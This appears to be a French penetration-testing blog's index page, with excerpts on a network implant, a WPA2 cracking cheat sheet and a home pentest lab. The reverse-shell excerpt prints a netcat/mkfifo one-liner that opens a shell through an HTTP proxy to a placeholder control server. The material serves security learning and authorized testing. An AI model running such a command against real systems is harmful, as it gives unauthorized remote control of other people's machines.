Configuration d'un implant réseau sous OpenWRT

Posted on sam. 20 février 2021 in tuto • Tagged with infosec, tuto, tools, vpn, sysadmin, pentest

Un outil courant lors d'audits d'intrusion est l'implant réseau : il s'agit d'un petit appareil que l'on va déposer chez la cible et raccorder à son réseau, et qui va nous permettre d'y accéder via une connexion distante, le tout à l'aide d'un tunnel sécurisé. S'il existe des solutions commerciales comme …


Continue reading

Cheatsheet : WPA2-PSK

Posted on mer. 20 mai 2020 in cheatsheet • Tagged with infosec, pentest, wifi, aircrack

Disclaimer

N'effectuez ces manipulations que sur des réseaux/machines pour lesquelles vous avez une autorisation explicite.

Mode monitoring

  • Désactiver la gestion de l'interface par NetworkManager :
nmcli dev set wlan0 managed no
  • Activer le mode monitoring sur l'interface :
airmon-ng start wlan0

L'interface de monitoring est maintenant wlan0mon ou assimilé (check avec …


Continue reading

Post-it : Reverse shell à travers un proxy HTTP

Posted on ven. 14 juin 2019 in post-it • Tagged with pentest, post-exploitation

Obtenir un reverse shell :

  • via netcat
  • sans droits root
  • en traversant un proxy HTTP
mkfifo /tmp/f; cat /tmp/f|/bin/sh -i 2>&1 | nc -X connect -x [IP Proxy]:[Port Proxy] [IP du serveur de contrôle] [Port en écoute pour le reverse shell] > /tmp/f; rm /tmp/f …

Continue reading

Création d'un lab de pentest à la maison

Posted on jeu. 18 octobre 2018 in vrac • Tagged with pentest, tools, virtualisation, lab

Depuis un certain temps, j'avais dans la tête l'idée de me créer un lab de pentest chez moi. Le but était d'avoir un "micro-réseau" d'entreprise (avec les éléments qu'on retrouve souvent dans une entreprise classique) pour pouvoir tester des outils et méthodes et monter en compétences sur les différentes technos …


Continue reading